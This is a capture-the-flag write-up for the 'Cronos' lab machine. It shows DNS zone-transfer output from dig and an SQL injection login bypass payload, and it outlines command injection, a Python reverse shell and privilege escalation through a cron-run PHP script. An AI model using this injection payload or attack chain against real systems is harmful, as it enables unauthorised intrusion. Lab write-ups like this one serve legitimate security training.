We execute a zone transfer using dig and got a virtual host to the admin page which is vulnerable to SQL injection.
Once logged in, we send the request through Burp and we can get command execution from a tool that performs ping and traceroute. Got reverse shell using python
We notice that root executes a php script every minute, and this script is owned by our user www-data. Replacing the php script with our code, and we get root
# dig cronos.htb @10.10.10.13; <<>>DiG9.11.16-2-Debian<<>>cronos.htb@10.10.10.13;; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12057;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 4096;; QUESTION SECTION:;cronos.htb. IN A;; ANSWER SECTION:cronos.htb. 604800 IN A 10.10.10.13;; AUTHORITY SECTION:cronos.htb. 604800 IN NS ns1.cronos.htb.;; ADDITIONAL SECTION:ns1.cronos.htb. 604800 IN A 10.10.10.13;; Query time: 55 msec;; SERVER: 10.10.10.13#53(10.10.10.13);; WHEN: Tue Apr 14 22:25:48 EDT 2020;; MSG SIZE rcvd: 89
Zone transfer
# dig axfr cronos.htb @10.10.10.13; <<>>DiG9.11.16-2-Debian<<>>axfrcronos.htb@10.10.10.13;; global options: +cmdcronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 cronos.htb. 604800 IN NS ns1.cronos.htb.cronos.htb. 604800 IN A 10.10.10.13admin.cronos.htb. 604800 IN A 10.10.10.13ns1.cronos.htb. 604800 IN A 10.10.10.13www.cronos.htb. 604800 IN A 10.10.10.13cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800;; Query time: 56 msec;; SERVER: 10.10.10.13#53(10.10.10.13);; WHEN: Tue Apr 14 22:30:14 EDT 2020;; XFR size: 7 records (messages 1, bytes 203)
The interesting part here is admin.cronos.htb
HTTP
On the the admin page, we tried guessing a few usernames and passwords but got nothing. However when we tried a few SQLi I was able to login using the following:
Username: admin' #
Password: admin
Once logged in, we are redirected to this tool which allows us to ping and traceroute